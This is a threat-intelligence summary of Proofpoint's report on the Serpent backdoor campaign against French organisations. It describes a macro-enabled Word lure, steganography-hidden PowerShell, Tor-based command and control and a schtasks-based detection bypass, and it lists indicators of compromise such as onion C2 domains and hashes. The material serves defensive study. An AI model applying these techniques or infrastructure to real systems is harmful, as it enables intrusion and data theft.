Proofpoint details a targeted French campaign delivering a backdoor named Serpent through a macro-enabled Word document that installs Chocolatey and Python via steganography. The operation uses Tor-based C2, a novel schtasks-based execution technique, and onion-hosted infrastructure to enable remote control and data exfiltration, with attribution not yet assigned. #SerpentBackdoor #Chocolatey #GDPR #France #Steganography #Proofpoint #Tor #onion.pet
Keypoints
- Targeted attack against French entities in the construction, real estate, and government sectors.
- Delivery via a macro-enabled Microsoft Word document masquerading as GDPR information (e.g., “Candidature – Jeanne Vrakele”).
- The macro reaches out to image URLs containing base64-encoded PowerShell scripts hidden via steganography to download and install Chocolatey, then Python and dependencies.
- Steganography is used to conceal both the initial PowerShell and subsequent Python payloads inside images hosted on a Jamaican credit union site.
- The Serpent backdoor downloads commands from an onion-based order server, executes them, and reports results via Termbin to an onion-based answer server, using Tor for C2.
- A novel detection-bypass technique uses schtasks.exe to create a scheduled task that runs a portable executable, aiming to run under a signed process lineage (taskhostsw.exe).
- Proofpoint notes no attribution to a known actor and highlights advanced, targeted threat characteristics; Campaign Discovery (Camp Disco) is used to cluster threats.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The campaign uses a macro-enabled Word document purporting to contain GDPR information to lure victims. ‘The messages contain a macro-enabled Microsoft Word document masquerading as information relating to the “règlement général sur la protection des données (GDPR)”.’
- [T1059.001] PowerShell – A base64-encoded PowerShell script hidden in an image via steganography downloads and installs Chocolatey and Python. ‘base64 encoded PowerShell script hidden in the image using steganography.’
- [T1027.001] Steganography – Scripts are concealed inside images used in the macro and payload delivery. ‘hidden in the image using steganography.’
- [T1105] Ingress Tool Transfer – The script downloads and installs the Chocolatey installer and repository script, then installs Python and dependencies. ‘downloads, installs, and updates the Chocolatey installer package and repository script.’
- [T1059.003] Windows Command Shell – A .bat file is created and executed to run the Python script. ‘creates and executes a .bat file that in turn executes the Python script.’
- [T1071.001] Web Protocols – The backdoor communicates via HTTP/Internet-based C2 using order and answer servers with onion URLs. ‘The Serpent backdoor periodically pings the “order” server … and expects responses … The malware then uses PySocks to connect to the command line pastebin tool Termbin … sends a request to the “answer” server …’
- [T1090] Proxy – The malware uses Tor-based proxy infrastructure for C2 communications. ‘a Tor proxy for command and control (C2) infrastructure.’
- [T1053.005] Scheduled Task – The campaign showcases a novel use of schtasks.exe to create and delete a scheduled task, facilitating execution of a portable executable. ‘schtasks.exe /CREATE /SC ONEVENT …’
Indicators of Compromise
- [URL] Encoded Payload URL – https://www[.]fhccu[.]com/images/ship3[.]jpg, https://www[.]fhccu[.]com/images/7[.]jpg
- [Domain] C2 – mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html, ggfwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid.onion.pet/index.html
- [Domain] ShortURL – shorturl.at/qzES8
- [Email Address] Sender emails – jeanne.vrakele@gmail[.]com, jean.dupontel@protonmail[.]com, no-reply@dgfip-nanterre[.]com
- [SHA256] Docm SHA256 – f988e252551fe83b5fc3749e1d844c31fad60be0c25e546c80dbb9923e03eaf2, ec8c8c44eae3360be03e88a4bc7bb03f3de8d0a298bff7250941776fcea9faab, 8912f7255b8f091e90083e584709cf0c69a9b55e09587f5927c9ac39447d6a19
- [File Name] – ship.jpg, ship3.jpg, 7.jpg (images used for steganography payload delivery)